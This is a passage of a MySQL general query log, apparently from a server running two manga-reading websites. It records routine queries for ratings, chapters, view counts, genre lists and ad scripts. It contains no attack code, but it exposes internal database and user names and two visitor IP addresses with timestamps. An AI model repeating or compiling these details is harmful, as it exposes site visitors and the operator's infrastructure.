ratings where manga_id = '236' order by created desc 330658409 Quit 330658410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330658410 Quit 330658411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330658411 Quit 330658412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330658412 Quit 330658413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330658413 Quit 330658414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330658414 Quit 330658415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330658415 Quit 330658416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330658416 Quit 330658417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330658417 Quit 330658418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330658418 Quit 330658419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330658419 Quit 330658420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330658420 Quit 330658421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330658421 Quit 330658422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330658422 Quit 330658423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330658423 Quit 330658424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330658424 Quit 330658425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330658425 Quit 330658426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330658426 Quit 330658427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330658427 Quit 330658428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330658428 Quit 330658429 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330658429 Quit 330658430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330658430 Quit 330658431 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330658431 Quit 330658432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330658432 Quit 330658433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330658433 Quit 330658434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330658434 Quit 330658435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330658435 Quit 330658436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330658436 Quit 330658437 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330658437 Quit 330658438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330658438 Quit 330658439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330658439 Quit 330658440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330658440 Quit 330658441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330658441 Quit 330658442 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330658442 Quit 330658443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330658443 Quit 330658444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330658444 Quit 330658445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330658445 Quit 330658446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330658446 Quit 330658447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330658447 Quit 330658448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330658448 Quit 330658449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330658449 Quit 330658450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330658450 Quit 330658451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330658451 Quit 330658452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330658452 Quit 330658453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330658453 Quit 330658454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330658454 Quit 330658455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658455 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330658455 Quit 330658456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330658456 Quit 330658457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330658457 Quit 330658458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330658458 Quit 330658459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330658459 Quit 330658460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330658460 Quit 330658461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330658461 Quit 330658462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330658462 Quit 330658463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330658463 Quit 330658464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330658464 Quit 330658465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330658465 Quit 330658466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330658466 Quit 330658467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330658467 Quit 330658468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330658468 Quit 330658469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330658469 Quit 330658470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330658470 Quit 330658471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330658471 Quit 330658472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330658472 Quit 330658473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330658473 Quit 330658474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330658474 Quit 330658475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330658475 Quit 330658476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330658476 Quit 330658477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330658477 Quit 330658478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330658478 Quit 330658479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330658479 Quit 330658480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330658480 Quit 330658481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330658481 Quit 330658482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330658482 Quit 330658483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330658483 Quit 330658484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330658484 Quit 330658485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330658485 Quit 330658486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330658486 Quit 330658487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330658487 Quit 330658488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330658488 Quit 330658489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330658489 Quit 330658490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330658490 Quit 330658491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330658491 Quit 330658492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330658492 Quit 330658493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330658493 Quit 330658494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330658494 Quit 330658495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330658495 Quit 330658496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330658496 Quit 330658497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330658497 Quit 330658498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330658498 Quit 330658499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330658499 Quit 330658500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330658500 Quit 330658501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330658501 Quit 330658502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330658502 Quit 330658503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330658503 Quit 330658504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330658504 Quit 330658505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330658505 Quit 330658506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330658506 Quit 330658507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330658507 Quit 330658508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330658508 Quit 330658509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658509 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330658509 Quit 330658510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330658510 Quit 330658511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658511 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330658511 Quit 330658512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658512 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330658512 Quit 330658513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658513 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330658513 Quit 330658514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330658514 Quit 330658515 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658516 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658515 Quit 330658516 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10459' and m.active = 1 330658516 Quit 330658517 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658517 Query select * FROM chapters where id = '10459' 330658517 Quit 330658518 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658518 Query select * FROM chapters where manga_id = '218' order by display_priority ASC, id desc 330658518 Quit 330658519 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658519 Query Update chapters set view=view+1 where id = '10459' 330658519 Quit 330658520 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658520 Query select * FROM chapters where id = '10459' 330658520 Quit 330658521 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658521 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10459' and m.active = 1 330658521 Quit 330658522 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658522 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('218', '10459', '1.38.1.120', 'mangaberri.com', '2026-02-26 03:29:56', '2026-02-26 03:29:56') 330658522 Quit 330658523 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658523 Query select * FROM chapter_images where chapter_id = '10459' 330658523 Quit 330658524 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658524 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '218' and m.active = 1 330658524 Quit 330658525 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658525 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='218' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Parody%' OR genres like '%Sci-Fi%' OR genres like '%Seinen%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330658525 Quit 330658526 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658527 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658527 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658526 Quit 330658527 Quit 330658528 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658529 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658528 Quit 330658529 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658529 Quit 330658530 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658531 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658530 Quit 330658531 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658531 Quit 330658532 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658533 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658532 Quit 330658533 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658533 Quit 330658159 Quit 330658534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658534 Quit 330658535 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658535 Quit 330658536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658536 Quit 330658537 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658537 Quit 330658538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658538 Quit 330658539 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658539 Quit 330658540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658540 Quit 330658541 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658541 Quit 330658542 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658543 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658542 Quit 330658543 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12792' and m.active = 1 330658543 Quit 330658544 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658544 Query select * FROM chapters where id = '12792' 330658544 Quit 330658545 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658545 Query select * FROM chapters where manga_id = '35' order by display_priority ASC, id desc 330658545 Quit 330658546 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658546 Query Update chapters set view=view+1 where id = '12792' 330658546 Quit 330658547 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658547 Query select * FROM chapters where id = '12792' 330658547 Quit 330658548 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658548 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12792' and m.active = 1 330658548 Quit 330658549 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658549 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('35', '12792', '106.216.255.195', 'mangaberri.com', '2026-02-26 03:29:56', '2026-02-26 03:29:56') 330658549 Quit 330658550 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658550 Query select * FROM chapter_images where chapter_id = '12792' 330658550 Quit 330658551 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658551 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '35' and m.active = 1 330658551 Quit 330658552 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658552 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='35' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Fantasy%' OR genres like '%Military%' OR genres like '%Shounen%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330658552 Quit 330658553 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658554 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658553 Quit 330658554 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330658554 Quit 330658555 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658556 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658555 Quit 330658556 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658556 Quit 330658557 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658558 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658557 Quit 330658558 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658558 Quit 330658559 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658560 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330658559 Quit 330658560 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330658560 Quit 330658561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658561 Quit 330658562 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12418' 330658562 Quit 330658563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330658563 Query select * FROM chapters where id = '12418' 330658563 Quit 330658564 Connect mangauser@localhost on 